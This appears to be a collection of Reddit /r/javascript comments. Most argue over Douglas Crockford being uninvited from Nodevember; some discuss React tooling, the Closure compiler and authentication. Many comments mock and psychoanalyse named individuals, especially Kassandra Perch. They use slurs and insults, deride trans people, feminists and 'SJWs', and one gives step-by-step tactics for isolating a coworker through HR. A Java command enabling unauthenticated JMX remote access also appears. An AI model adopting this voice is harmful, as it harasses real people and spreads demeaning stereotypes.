1. uninvite: &gt; you’re not welcome here because *we decide* to exclude you back out: &gt; *you decided* you don’t want to come for personal reasons (i.e. not objective problems like the conference tolerating sexism, racism, …) here, they presented no evidence of crockford saying anything problematic, so it’s the second case. 2. emily rose (one of the two stirring this up) posted 2 (two) examples of crockford’s behavior, both of which only demonstrate only that emily doesn’t bother to use a dictionary if they think their incomplete knowledge of a term is sufficient: 1. crockford’s talk title “monads and gonads”, “gonads” being an umbrella term for testes *and* ovaries (=no sexism), and 2. his “slut shaming” which laughably consists of him *praising* the early web for being “promiscuous” (a well-known networking term as well as the other meaning), before going on that *in some cases* 1-to-1 relationships (e.g. to your bank) are preferable (=also not an issue) is summary, nothing happened except for kas (the other troublemaker) and emily bullying crockford (ageism or simply misunderstanding words? decide for yourself) 3. if aforementioned cases are the best they come up with, i’d rather err on the side of inclusiveness and don’t ban people for vague allegations that aren’t backed up with anything.
&gt; I don't see why The whole purpose of communication is to address what you don’t see. Only, for it to work, you have to be open to that.
@jimbolla actually.... what do you think about this? @connect( ({ userId }) =&gt; ({ userId }), dispatch =&gt; bindActionCreators({ fetchData }, dispatch) ) @rxConnect(props$ =&gt; ...) Got this idea from a comment on Habrahabr, and HOC composition seems like a really nice approach, doesn't it?
it was explicitly stated that there never were any more facts than given to the public. see this excerpt of the [slack logs](http://pastebin.com/3mQc7DfG): &gt; William Golden [9:54 AM] &gt; &gt; But specifically, he was uninvited because other attendees and speakers did not feel comfortable attending/speaking with him there &gt; &gt; Andrew Albright [9:54 AM] &gt; &gt; I think to sum it up, many conference speakers have spoken with him at other conferences and generally didn't like his attitude and condescending nature, and have openly refused to speak at a conference with him in the future. Maybe some of those speakers accepted the Nodevember invite, but then discovered he was also speaking and were going to back out? although i’m not sure about the “many”: i only ever heard about @nodebotanist and @nexxylove, none of which provided a single quote that was sexist, slut-shaming, or any other brand of inolerant. [paul straw’ blogpost](https://paulstraw.svbtle.com/crockford) (also linked from this post) analyzes it all well.
Maybe I could have worded it better, but that's exactly what I meant &gt;The then method of a promise returns another promise that resolves to the value returned by its callback It's just that when you resolve a promise whose `then` method returns a promise, which itself returns a value, its easier to just think about the original promise returning the value itself.
What a bunch of pussies.
How about you go to your safe space where nothing can touch you?
JavaScript drama generates async karma [edit] [obligatory Orly cover](https://www.reddit.com/r/orlybooks/comments/51eapm/javascript_the_borst_parts/)
Can you explain more what you mean by "top level await"? Like, a use case or example?
But going any further down is just being stupid about it
What does he do that makes you want to avoid him?
What is a programming language academic, then?
That's what I thought. Thanks for your comments, I will bear them in mind going forward.
@nodebotanist is Kassandra Perch, she made a lot of conferences. Some are interesting, but one of these, "[Don't be a yutz](https://www.youtube.com/watch?v=AMSZEGNMwUw)" is PC bullshit at its finest : &gt; "You need to speak up against bad behavior, **especially when the person is not represented in the room**" [link](https://www.youtube.com/watch?v=AMSZEGNMwUw&amp;t=7m42s) &gt; "If I sound angry it's because I am... Because if I hear «I'm sorry about my actions» one more time, I may not be responsible for my actions after that." [link](https://www.youtube.com/watch?v=AMSZEGNMwUw&amp;t=12m37s) There are other uncomfortable things she say. Listen to the speech and you understand that she is obsessed with "bad actors". From what I've read, the community agrees that Crockford said dumb jokes, and those sad people jumped on it to present him as an hostile sexist. After listening to Perch's speech, I wouldn't be surprised that she quoted voluntarily out of context in order to push her agenda. Edit : presentation
And the sync is to a CouchDB instance, so you can add things to db offline and it sync once online again.
I mean, if you are going to put quotes around it I hope it actually is a quote.
Kassandra Perch is clearly suffering from some unresolved emotional pain which has festered into misandry. While I feel bad for her (and embarrassed for her, frankly, for flaunting it so proudly) I can't imagine that many professionals could work with someone with such a **[simmering passive-aggression (start at 12m 58s)](https://youtu.be/tBRGMcdAKzs?t=778)** and I certainly wouldn't blame them.
What are some of the other wonky things? Just curious.
I remember when node started and it was 6 people in an irc channel. they just wanted to make something work. now it's completely out there, 7 years later. the people telling me right back then i'm crazy for using node on production in late 2009 acting like they invented it. it became a movement with many heads and that's why i personally stay out of it for the last 5 years. it became the more advanced, more fragmented, more chefs working on their own thing version of RoR and it's sad.
This makes sense. I'm not justifying what he said, but I agree he most likely has a low EQ.
Hehm, asking what is more commonly used for research? Language by itself obviously can't be academic. It's just the crowd it attracts and it's virtues.
I couldn't make it 20 seconds.
&gt; more chefs working on their own thing version of RoR and it's sad. what kind of fragmentation are you talking about? I don't see any fragmentation in node.js community. One mismanaged conference doesn't mean node/JS community is fragmented.
It's such impossibly high standards.
Oh.. another nutcase, is that what Mx prefix is for? anyway auth0 to the vendor blacklist.. I mean block list.. 
Have you upset someone ? You're a yutz. Have you made someone feel uncomfortable, intentionally or not ? You're a yutz. Do you have more character than a pasteurized white cheese ? You're a yutz. Do you feel entitled to patronize people about their behavior, write speeches about political correctness and invite yourself at conferences so you can voice your opinion in an authoritative context ? You're an *activist*.
You can try create-react-app official from facebook. See this blog post https://facebook.github.io/react/blog/2016/07/22/create-apps-with-no-configuration.html
I am talking about real world projects, for big money, not pet projects. Things like router/tests/internationalization are very basic 101 stuff that are included or super easy to achive in all other frameworks. Thats exactly what im talking about, there are no standards in React Ecosystem, it feels like toy, like a tool for hackaton not you real project. I know you can mix and match, i know exactly what React is. My problem is that React is 3 years old and by know there should be some quality guidelines how to make a good stable project, there are is nothing like that, only godzilla boilerplates.
But isnt that a problem? That everyone is so lost, everyone is building their own boilerplate.
Damn. This PC culture is allowing drama queens to troll for the limelight while the folks who helped create a community through technical contributions are sidelined. Sad day indeed for all of us JavaScript developers.
Thats a simple math, if angular will give me everything that i get from these godzilla boilerplates but without 30 config files then its no brainer to not to choose angular.
It is sad day indeed, not only sidelined but they - the SJWs - want them to "move on.." Safia Abdalla ‏@captainsafia Sep 3 He's part of the old guard of tech, and while it's important to recognize his contributions, it's time to move on. 0 retweets 22 likes Unbelievable.. 
The people who make their own boilerplates probably aren't that lost. Most of them are just customized by a developer for themselves. If you really do want to just use a boilerplate, [use Facebook's official one.](https://facebook.github.io/react/blog/2016/07/22/create-apps-with-no-configuration.html) It seems like it fits what you're looking for.
On the other hand I'm interested to know who paid to sit there and listen to those talks and didn't just get up and walk out or go do some real work if they have an audience they'll believe more in their own self importance.
This project looks really great for client side storage on hybrid apps, does anyone know if it's possible to replicate to a php/MySQL backend? I guess you would need to implement the couchdb replication protocol, but maybe someone already has?
Yeah don't be a yutz
having? There's no having in Linq...
So I don't really follow the who's who of the JavaScript world that closely, but I know who Crockford is and would definitely attend a conference to see him speak in person. I have no idea who those other two people are, and based on what is provided of the botanist content here I have absolutely no desire to listen to them talk. If you are organizing a conference and had to choose between Crockford and the other two, wanting to increase your attendance; I would suggest the former.
At [13:15](https://youtu.be/tBRGMcdAKzs?t=13m15s) - that segment. Clear signs of a bully. "Go on, I dare you". I know, I lived with one for a long time.
Thanks :)
"You wouldn't believe #4"
Yeah, I don't understand how diversity should be the main goal for anything related to programming. Your github account name is just a random screen name, nobody cares what you identify as or what you do outside of coding, only the code counts (and to a lesser degree if you can behave professionally within the community of whatever project you're working on, so not starting flamewars or no trolling).
Wait, really? Which version, port, and where can I learn more?
Agree. I do find it kinda crazy to attend a conference (or not) about a programming language you like based solely on one person speaking (or not). I'm not even sure that most of the people that attend even care about this drama. 
4 days and 6+ stories later on the front page of /r/javascript - and I just realized when I stepped into the shower that it's "node-vember," not "no-dev-ember." I have been so confused. I feel bad for the organizers. It's one kind of difficult to overcome latent prejudice and strive for honest inclusivity - and another to learn to identify and deal with "Difficult People." If you don't have a great deal of social awareness (as I don't) - they make a lot of headway before you realize what they're up to. And spaces that advertise inclusivity are prime targets. :-/
lol. Get out...
To draw in javascript without a third party library you can draw onto the canvas, an HTML5 element. You should use www.codepen.io rather than jsfiddle though, much better software and you can check out other peoples pens and learn from them!
For very small projects, it should be faster as you don't incur the penalty of loading the JVM. For larger projects, the java version will probably win out for time.
Hi /u/vinodtank, it looks like you're new to reddit, welcome! Thanks for the submissions, but please make sure you read http://www.reddit.com/rules and our [guidelines](http://www.reddit.com/r/javascript/wiki/index). In short, you should post from a variety of sources, and not just `ivinod.com`. Thanks for your consideration! domain submitted from|count|% :-|-:|-: [ivinod.com](/search?q=%28and+site%3A%27ivinod.com%27+author%3A%27vinodtank%27+is_self%3A0+%29&amp;restrict_sr=off&amp;sort=new&amp;feature=legacy_search)|11|100%
I suspect Crockford is on the autism spectrum and simply doesn't realise he's being insensitive. If no one has discussed the issues then that's the problem here. There are always going to be people you don't get along with. As a speaker and an adult, you can avoid that person as much as possible. If, however they _are_ purposefully upsetting or victimising someone or they are being bigoted, racist, etc then they should be spoken to about what they have done and how they should behave.
I don't find it crazy in principle to not attend the conference based on a particular person speaking -- if the conference were hosting a known KKK leader, it would be difficult to want to attend the conference knowing that part of the money you paid to attend the conference was going to the Klan. What I *do* think is crazy is refusing to attend a conference because a single speaker has said a few things that you might possibly be able to twist around and look at *just right* in order to construe them as being minorly insensitive. This is particularly appalling when you are a person in a position to ask the speaker in question for clarification, or to open up a dialog with them about why you disliked their comments, rather than acting like a spoiled and petulant child.
Securing a server, good luck with random npm modules then. FYI, I use openjdk, port 1099 is NOT in use by default. You have to run java and specifically tell it to listen (and drill holes in your firewall) so this sounds like some misinformation. It would be like starting a dev server then saying OMG IT OPENED A PORT!! java -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.port=1099 
Seriously, I was reading through the accusations, and it's not very clear. This counts as slut shamming? &gt; … the Old Web was great because it provided promiscuity. It meant that you could go and connect to anything, and you’re probably gonna be ok. You might get shocked and embarrassed, but your machine’s not gonna get taken over, your identity’s not gonna get stolen. … And that’s good, because that allows us to get introduced to things. We used to call it “surfing”, where you could go from one thing to another, and discover stuff, and start forming relationships. Unfortunately, the same thing which allows the promiscuity to work is very bad for dealing with commitment, so that’s what the New Web is for. Now, once I’ve found my bank, I want to make sure from this point on I’m talking to my bank, and I’m not talking to anything which pretends to be my bank. Have micro-aggressions gone too far?
&gt; and I just realized when I stepped into the shower that it's "node-vember," not "no-dev-ember." Another instance of the expertsexchange naming issue
I don't feel bad for them. They screwed up and behaved like assholes, I'm sure most of them are that's why some of them know it's time to stop being associated with that bunch of idiots, it might ruin careers. I surely will never hire one of them for their despicable behavior. I'm sure it's no big loss, many business will be eager to do so /s
A tad off-topic, but have you checked out Visual Studio Code? It contains integration with node-debug, with a one-click config file setup.
But i have to argue, I think 90% of people use it as if it was framework, with react-router and all. If React is not a framework then what is the main usecase of it? Do you just use it to add some widgets on websites? I dont get it. And dont tell me that you can use React with any other framework because React is pretty useless in Angular 2 / Ember 2.
https://eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design/ Note that many of the points of criticism were fixed since the post was released in 2012
Ok, so 4x slower build, because you added massive software package on top of a massive software package on top of a massive software package... &gt; I can say that it is 100% on by default on our one system that uses it (Centos 7) It isn't, I just checked. You are doing something massively wrong (including opening port 1099 in the firewall for no apparent reason) security issues were about java in the browser primarily, that is dead, java on the server has a PROVEN track record, can't say the same about node, and in this case it is only running briefly while closure runs, not as a service.
I remember there was a movement to change the master/slave label of hard drives back when that was a thing. There was also an attempt to change motherboard to mainboard. This shit has been going on forever.
You don't have to be in Silicon Valley to write code, and open source projects can cater to the most obscure needs, you only need an internet connection and a basic pc to start a project, github is free, Ubuntu is free, vi is free, ... The reason Silicon Valley initially caters for the stereotypical twenty-something male is exactly the relatively higher disposable income + the fact that they'll be more likely to try something new. However, once a startup moves past that stage, they can provide a benefit to everyone. For example, a lot of people that would traditionally be discriminated by taxis (some cabbies are super racist) or women that felt unsafe in taxis before due to some pervy cabbies that could get away with a lot of bullshit tend to use Uber pretty much exclusively (how Uber treats their drivers is another story, obviously, that's a big downside).
I don't know. The programming community overall is made of welcoming dudes, with a normal minority of pedants and "lol look at me I'm such a nerd". It's not like we need an expurgation campaign.
I completely agree, thats why i wish React to succeed. But as i said, if people dont stop overcomplicating things React will die. Its natural that you need some learning with every technology but the most starred React boilerplates on github are overcomplicated to the point of being useless (when mostly all you need is short webpack and karma config). React is beautifully simple, all this beauty is lost thanks to broken community.
heresays.
"Edit 2016-09-06 7:55AM CT - I am told there were DM’s received to the Nodevember twitter account on 2016-09-01 related to this. I had no knowledge of them and as a result failed to mention in my view of the timeline below."
Maybe you shouldn't be ashamed of being a white male, but you should be ashamed that you are a cisgendered sexist and racist pig.
Exactly. Can we set up a "safe space" where we go to, you know, talk about fucking programming.
Hooooly shit. I had no idea the developer community was like this.... And I had no idea companies that would fire someone over a joke as harmless as huge dongles existed either. Wtf
thanks :)
I would like to understand how you got the notion that java running for 30 seconds was a security risk. That sounds more like phobia style paranoia.
People need to get over it, not everyone is nice. Not everyone is going to agree with you. 
If he had some really interesting things to share about javascript, I'd be willing to let the whole KKK thing slide. I'd probably balk if he gave the the talk wearing a white sheet, although if he could explain the Angular 2 router I'd roll with it.
It's probably because all the rubyists jumped off the sinking ruby ship and went to node instead. The ruby community was famous for it's drama, and now JS has it as well. 
Can't speak for Inferno. For React, its specific algorithm assumes that if you rendered ComponentA in this spot last time, and ComponentB this time, that everything under there is likely to be different, and so it throws out all previous diff info for that subtree. For your case, it looks like the root component is the same, so yes, it would diff as expected. Ultimately you'd wind up with the desired components rendered either way, just a question of how efficient the process would be. That said, calling ReactDOM.render multiple times with the same component and parent element is fine - as I understand it, it basically acts as if there was another component rerendering this one, and you can use that idea to pass in new props to the root component.
https://facebook.github.io/react/docs/reconciliation.html &gt;Since an optimal algorithm is not tractable, we implement a non-optimal O(n) algorithm using heuristics based on two assumptions: &gt; &gt;1. Two components of the same class will generate similar trees and **two components of different classes** will generate different trees. &gt;2. It is possible to provide a unique key for elements that is stable across different renders.
Yes, "apart" should have been "a part". "I was not apart" means he was there for the decision; "I was not a part" means he did not participate in the decision.
&gt; what is the typo? "apart" that should have been "part/a part"? Yup, "apart" is probably a typo. I imagine the author meant "a part". If two things are joined then they are "not apart" and hence, reading literally, the author was involved with (or joined to) the decision. If two things are separate then one is "not a part" of the other. Perhaps it's a trait of being a programmer but I tend to unconsciously read things as written and *then* try to infer what was meant by the wetware between the ears. This makes me feel sad inside each time I have to do it. I find the confusion of "everyday" vs. "every day", "allot" vs. "a lot", "your" vs "you're", the grocer's apostrophe, etc, etc *extremely* uncomfortable to see. It's just as unsettling as: if((a !== b) { console.log('a and b differ'); } But then, not everyone flaps and that's OK[1]. So, in an attempt to stay on topic rather than just venting, I'll say that I'm not pushing for speakers who have a habit of including eggcorns in their slides to be excluded from conferences on my behalf. [1] https://www.amazon.co.uk/Why-Johnny-Doesnt-Flap-NT/dp/1849057214
What a damn mess. 
Because people don't like being around assholes. It seems like there's a (dying) generation of programmers that think they are so fucking smart that everything they say should be put in books. Crockford is one of those people. You two seem similar. But disliking him isn't the same thing as uninviting him. The latter is some serious bulllshit. The former is perfectly understandable.
&gt;&gt;is easier to manage and maintain over the course of a node application than installing java, installing the closure compiler jar, keeping them both up to date No, it takes less time to install java then to run the node version of closure, and you don't have to "keep it up to date", it isn't a service, it just has to work.
You bring up a good point. I guess a good chunk of us (not everyone, of course) started tinkering with computers because we weren't interested in playing outside, developing social skills and all that stuff. The field attracts a lot of introverted people who will put up with a lot of shit and actively avoid any sort of conflict. Basically the ideal victim for the SJW crowd. You largely don't need a degree to get a job as a software developer (it helps, but you can easily teach yourself with resources available AND find a job if you built something that proves to a potential employer that you do have the skills), while lawyers and doctors need to invest multiple years in their education, which could be all moot if they screw up bad enough to get disbarred/lose their medical license/whatever. I like the way programming is open for everyone, but I really want to see how much code the SJW crowd actually writes compared to how much drama they generate and careers they ruin (like those dongle guys at the Python conference).
Yeah, probably, but, unfortunately, all of the fucks I have to give are already accounted for. 
SJW aside, the tone and jokes in Crockford's talks are certainly cringeworthy, unprofessional and unnecessary in a technical setting.
ruby is alive and well
&gt; We're all adults; nobody is actually offended by kindergarten level jokes (it's possible that I'm missing some actually offensive content here). *Triggered* Seriously, that is the very definition of SJWs. They get offended by everything.
No shit. But that doesn't mean that people aren't going to be assholes. These SJWs are assholes too, they just pick on different people. 
TRIGGERED !!!!
shellshocked worked via the internet. the internet facing bits have to be kept up to date. running java-&gt;closure isn't an internet facing activity, it is like running gcc. Think eval or shell. Look, I hate to say what a horrible security mess you actually have in node, but really.
Hi Klathmon, java is needed for a bug free and fast closure compile, suck it up buttercup.
Micro-aggressions are a horrible name for something that actually exists and should be addressed. But like all things that aren't very well defined, people ran with it and went way, way too far. IMO, there are very few things that are labeled as "microaggressions" that aren't actually outright racism or not worth talking about. But there are *some*. When someone says something like, "Of course you're good at math, you're Chinese!" that's a micro-aggression. You've managed to use stereotypes to make someone feel *bad* instead of good, unintentionally. Refusing to get on an elevator with a minority *because you're scared of their skin color* is just racism, and not a "micro-aggression". The last time I read a list of micro-aggressions, it included a lot that I felt were nothing. I can't find any of those lists right now, so that's good, at least. Of course, this article has provided a few by calling out technical words because they have alternate meanings that people don't like. But that's a different level of wrong than I'm talking about. The others above, I got from those lists.
micro-aggressions are a soapbox used by the professionally-offended and to take them too seriously is a step backwards in progressive society.
I disagree, but as I said, only because true "micro-aggressions" are pretty hard to find. Most things are actually racism or misunderstanding instead. The people using them as a soap-box as blowing them out of proportion, and that part of your statement I agree with.
You're acting like there's no open mic and karaoke after. There's room for bad behavior, just not on other people's time. Conferences are technical forums not day cares for children. 
What you argue is all about the way that a message is delivered, the choice of language, the cultural setting etc, all of it above the intended meaning, aimed to be carried within the message. That’s form over content. ‘People’ sounds cuddly and all, but people need knowledge as well as reassurance. Comfort may make you feel better, but knowledge helps you not die.
&gt; Why should i use the java version of closure compiler Because the node version has a lot of bugs and is slow, remember? Besides who doesn't like keeping things up to date, why not run the latest closure compiler? Or wait for someone to run java with gwt to make the slow and buggy node version months/years later?
Good question. I personally think its well suited for production. Their API for creating/destroying droplets is fairly straightforward, and making snapshots of an instance is both easy and incredibly extensible. I particularly like how hands-off it is; load balancing and scaling are in your hands, so for apps that have massive fluctuations in server-load, it is my preference to use DO.
So you’re okay with a less expert speaker taking up people’s time, but the nasty more expert speaker mustn’t come and challenge their worldview. Sounds quite like a creche to me. And, I didn’t catch your response re: censorship.
Doing anything on /r/ShitRedditSays gets you banned. They even ban their fellow SJW's for trying to participate in the sub. I think that they might not actually be true SJWs but a bunch of posers trying to give us a bad name.
Well it's a bummer he had to step down, but I understand why he did and probably would have done the same thing in his shoes. Hopefully everybody learned a valuable lesson and we can all hug it out and move on. Now lets go back to coding things and stop talking about this garbage.
My github is my full name :/ I must be doing it wrong...
Welcome to Reddit.
All in favor of /u/b_bellomo for Nodevember Organizer say 'I'.
I think chaining methods is perfectly readable. Seems like a lot of unnecessary faffing around, while adding an unnecessary dependency to your code. I can't imagine doing any of this in an interview situation, or being anything but bemused if I were interviewing an applicant who did it.
Excuse me m8 but I identify as a senior developer worth a 7 figure salary regardless of whether my GitHub account can back it up or not.
Am I being crazy, or did 5 lines of JS turn into a ton of dependencies and hassle? Am I just old?
`create-react-app` is intended to be a tool for starting a React app, with a smooth and useful developer experience out of the box, and no user configuration needed. If you then want to actually customize the configuration, you can run a one-time `npm run eject` command, which will copy the previously hidden configuration files for Webpack and the other tools to your app's folder, and rewrite your package.json to explicitly list the dependencies. All config files are commented and readable.
More mindless nonsense. Stop appealing to authority. Your made up hierarchy of speakers has nothing to do with the speaker's actions. Uttering words does not absolve anyone of consequences no matter who you are. And you're pretty narrow minded if you think that any other option would be settling for less. If the JavaScript community is low on experts, there are far more issues to take care of then.
Hi, Now I'm reading all the guidelines on reddit. I'll maintain the rules in future. Thank you for highlighting this. Vinod
So shouldn't they be uninvited too? I'm saying they are hypocrites who shouldn't have any leverage to say who gets to speak at a conference. Also, comfort in life is not guaranteed. It's not even a right. People's "feelings" are no more valid than my "feelings" or your "feelings". 
You have a real problem there at work. Guaranteed. If you allow this person to build their own high ground, nobody will ever survive a direct assault. They'll be able to pick off other workers at will for petty reasons. They'll cry "prejudice! diversity!" and incident reports will be handed out with a gatling gun. 1. Log everything. Log the conversations, the time it takes to deal with them, seemingly irrelevant interactions, unproductive time in irrelevant meetings that you've never had before, everything. EVERYTHING. A comprehensive log will save your ass. 1. get a couple of like minded coworkers 1. all of you have individual meetings with HR raising concerns about productivity. 1. talk about the inability to get things done and why. 1. always refer to "our coworker" or "the coworker". The genericizing of the name works wonders for batting away sexist claims. You've never talked about sex at all, you've only talked about productivity in the workplace. Meeting with HR, not a boss, is required for security. By law, it's confidential. You can tell this person "I wish to remain confidential" and they can't tell your boss who it was that raised these concerns. Meeting individually establishes a trend. Meeting together could be minimized as a single meeting. It also appears as ganging up. Know how the person thinks, predict what they will say and craft responses to the predictions. The 20% that are correct, you'll seem like a genius. The other 80% of your predictions that are wrong can easily be made as individual points in the overall conversation. Example: &gt; "daily email used to take :15, now it takes hours." `you spend hours fucking around on reddit!` &gt; And unproductively fucking around in email is worse. Besides, we all find ourselves researching on reddit and random blogs all the time anyway. You spend way more time crafting those emails to begin with. Bottom line: This is not going to go away, and you're not going to be able to stay out of the line of fire just by keeping your head down. She will eventually turn your way and next thing you know, you'll be walking out of the building with a box in your arms wondering what the fuck happened over the last couple weeks. Here's a person that has likely spent years honing this segment of their personality. And like any bully, inaction allows them to thrive. You can get this person back in their place (where their inability will become more obvious) but it will take preparation and diligence, and at least several people willing to back you up. You're going to have to point out the anti-productivity and it's source in the face of accusations of "misogyny" that are meant to get you off your game. You will have to remain on the point of productivity as they'll try to drag you into an irrelevant conversation. Bullies hold a special place in my heart. They get away with too much because the average person just wants them to STFU, without realizing that just rolling their eyes and getting back to life gives the bully some measure of win. Unless your bosses can see what is really going on, document everything, then call them on it, it's going to get much worse before it gets any better.
Why are children running grown up events..
Wrong language. 
If you dislike reference to authority then conferences are no place for you. Because here’s the thing about a conference: I’m mainly interested in hearing from people who know things that I don’t. The more things they know that I don’t, the more of my time I want to spend listening to them. A conference that doesn’t choose speakers for their expertise in the subject? Srsly? What are you talking about?
"why are you plagiarising my presentation?"
I've found a fellow brother/sister, the sponsor contacting definitely works as we already know :).
&gt; In sum, look up the definition of a phrase before you make a lackluster Internet attack on someone about it. I note that this has never stopped them from making attacks, e.g. on promiscuous.
Same here, they call us millennials, but we are not, not really. We are a transition generation of about.... 80 to .... 85 / 86. Most of us where brought up and attended school without a lot of computers and tech, only seeing it enter the school system in high school. I classify millennials as the group of people who grew up online, connected when they started school. We might have had cell phones in middle school, but txt messages where too expensive to actually be used as a valid chat system. 
You're looking for information on [where to safely store your token](https://stormpath.com/blog/where-to-store-your-jwts-cookies-vs-html5-web-storage). There are many resources such as the provided link. That said, for Google's sign in button you can optionally use the data it gives you instead of generating your own token. Since you're only verifying that the user has an account you can pass the ID token to your backend and validate it on the request according to [this documentation](https://developers.google.com/identity/sign-in/web/backend-auth). For a production project you probably don't want to go this route for performance reasons but for a personal project it can simplify your authentication logic overall.
Lol, read again, I did the opposite of generalizing
I agree, and regarding this whole issue, it sucks because I think diversity in tech culture is actually a really important issue, but when these overly-PC types take it too far they actually do their cause a disservice and make it harder to be taken seriously.
#*WHAT FUCKING SUBREDDIT AM I IN?*
I wish the conference organizers would stop trying to diffuse her bomb and just throw her out. She's like the Westboro Baptist Church of javascript conferences - intentionally attacking people just for attention. She's a bully, conference organizers should be protecting people from her, not the other way around.
&gt;look, i have absolutely nothing against rainbow-haired trans people with exotic pronouns. &gt;like vegans and feminists, they just suffer from a condition called “their vocal nutjobs are more visible/audible than the ones minding their own business” You're really that inept? You have nothing against rainbow-haired trans people with exotic pronouns, but like vegans and feminists, they're all the same. Yeah, that's basically the greatest example of generalizing I could ever come up with. It's also terrifyingly bigoted. Specifying the vocal nutjobs doesn't excuse the rhetoric you used, if that's what you're trying to point out. 
She actually has a scheduled calm down near the end of the talk. It's planned vitriol dressed up as some sort of civil rights heroism 
&gt; I've been thinking lately... are we developers weak? What is the problem that we allow this to happen? It's because the internet enables this kind of self promotion. The internet is also needed to make it spiral out of control.
I agree with your point but I still don't see what diversity has to do with anything, in any profession. What do I care if someone is [insert race/gender/religion] as long as they're good at what they do. Maybe attitudes are just different in the UK than the US. This whole issue just screams drama for the sake of drama to me.
I'm showing you how ridiculous the whole thing is. Excluding people who say things you don't like isn't diverse, forcing everyone to believe the same as you isn't diverse. I'm not saying that you personally are doing this, but the SJWs are. People have a right to be an asshole, just like you have a right to not interact with them. 
I saw her speak at Empire Node a year and a half ago. She gave a talk on what it's like to be a girl in a male dominated industry and the unwanted attention that goes with it. While I support her cause, and understand the frustration, I was appalled by her talk. She berated the audience and made everyone feel uncomfortable. She made the audience into the aggressor, and put forth many male stereotypes and generalizations, effectively making herself a huge hypocrite. I left feeling like I had done something wrong, and after some reflection I realized that it was her tone and accusations that were wrong, not me. Kassandra has a mission to make the industry more friendly to women, and I support that mission. However the way that she has positioned herself in this crusade creates more enemies than allies
It is the responsibility of the page the user returns to to store the token. From there you can reload once more to your main page and then load the token from wherever you stored it.
My favorite use case is loading html templates from within custom element definitions, making sure that the template is actually loaded before the module is considered ready: import {loadHtml} from '../load-html/load-html.js'; // this await is the top-level await // loadHtml returns a Promise&lt;HTMLDocument&gt; const templateDoc = await loadHtml('my-element.html'); const template = templateDoc.querySelector('template'); class MyElement extends HTMLElement { constructor() { super(); this.attachShadow({mode: 'open'}); this.shadowRoot.appendChild(document.importNode(template.content, true); } } 
You're going to need to "give" the browser something it can send with every request, to verify its identity. In the simplest case, this could be the identity token returned by Google, or the access token from within the identity token. Your single page application will save this, likely in localstorage, and send it in the headers when making API requests. Your API will then verify this token. This pattern is part of OAuth, and it's working by authentication via authorisation. To make things simpler, you could switch from the Authentication Code flow, to the Implicit flow; keeping the token entirely in the browser, and not involving passport for token acquisition.
It's perfectly logical to use derogatory language when you're accusing me of supporting censorship when I've never said anything about such a thing. You're free to talk about threats with guns, but when a platform is reserved for JavaScript, it would be in everyone's best interest to tell you, "Shut the fuck up and take your censorship bitch ass out of here".
Wouldn't it be better to just export an async init function or async IIFE from you module instead?
If they were relevant, they'd be getting attention for good content, not SJW twitter wars and teenage drama. End of.
That's very clever. Falsely accuse him and put him on the defensive. He'll get flustered and call you a nazi, and by Godwin's law, you win.
IMO you're asking the wrong question because I can easily contrive of situations where code minification isn't *necessary*. That doesn't make it unimportant or nullify the benefits.
I'm not saying I'm totally on board with this method (I agree that chaining is completely readable), but it does allow for currying and writing more functional code that conceptually translates into FP languages better, and there's other benefits that come with that. [This talk](https://www.youtube.com/watch?v=m3svKOdZijA) goes into more detail than the article does with better examples -- definitely worth the watch!
Write your own boilerplate? I have a personal boilerplate which you would probably say is "((overengineered)2)2" but its all stuff I use in pretty much every project. It sounds like you're looking for something to work completely for your use case out of the box and that is not what you get with React.
"And I bet we'll have better code. I would love to have proof, but I don't have a situation in which that's been the case."
I showed this article to a couple of devs at our shop. We all agreed the first example was the most readable. If I had to maintain this code I could see myself coming back to it in three months and spending so much time just trying to figure out what the hell it did.
That really sucks, and yeah I know a lot of people who believe similar things. I feel sorry for them since they've become confident in their righteousness that they don't realize they're trying to fight oppression and prejudice with more oppression and prejudice.
For the application I'm working on right now we have used [html-pdf](https://www.npmjs.com/package/html-pdf) in combination with [Mustache](https://github.com/janl/mustache.js/). You could take a look at that. You are going to need something like Phantomjs or another headless browser. If you are working from a client side only perspective you could take a look at the `window.print` API. If you favor doing all layout and markup in JavaScript you can also use [jspdf](https://parall.ax/products/jspdf). Hope it helps.
&gt; “their vocal nutjobs are more visible/audible than the ones minding their own business” Did you read over this part? He explicitly mentioned and clarifies that the majority are not like this.
The thing is, I don't want software development to be anything other than the free and open environment it currently is, and I can also see where the SJW's are coming from, in that it is sort of a sausage fest and it would be nice to have more women in the industry. But the way they're going about trying to fix this is entirely retarded. Especially when they hammer on about the white male heterosexual stuff, as if there isn't a whole bunch of software developers from Asia who probably outnumber the white male heterosexual software developers to begin with. In fact, the stupid controversies they stir up might end up scaring women away. If you listened to them you'd get the impression that developers spend more time trying to sexually harass women than writing code.
See that's the thing. It's not up to you to determine anyone's place. We have curators for that. You're not curating an event involving a sizable mass of people. If you're lacking in knowledge read. I'm sorry if that's not your strength. You can watch videos. Maybe somewhere in there you'll find all the gonads for you to enjoy. 
Diversity is important... but inclusion isn't. In my mind the key distinction is tolerance, which isn't the same as emotional harmony. Sympathy is a child's play toy. Adults deal in patience and disagreement.
Why did they remove it?
I think its trully foolish for moderators to ban any sort of community activity on their subreddit. Drama is actually quite important to a healthy community. 
You might want to check [parse server](https://github.com/ParsePlatform/parse-server) and [parse dashboard](https://github.com/ParsePlatform/parse-dashboard) out
It's high school though. Which of us didn't have embarrassing and stupid opinions about the world when we were 15/16?
lolololol
Have we? Not sure that we have. 
If you really are 20 years in the industry and still communicate like you do on this thread I feel truly sorry for you and I'm ashamed for my age group.
Very interesting, I'm gonna give it a closer look.
Phantomjs works pretty well, I used that before 
It would make it easier for developers to contribute if you have a repo going. Also, you can monitor what is being added in a more efficient way thanks to pull requests. You'll know as soon as someone wants to add a feature, and you'll be able to implement it into your code if the addition is a good fit, or refuse the code if you don't see it working. 
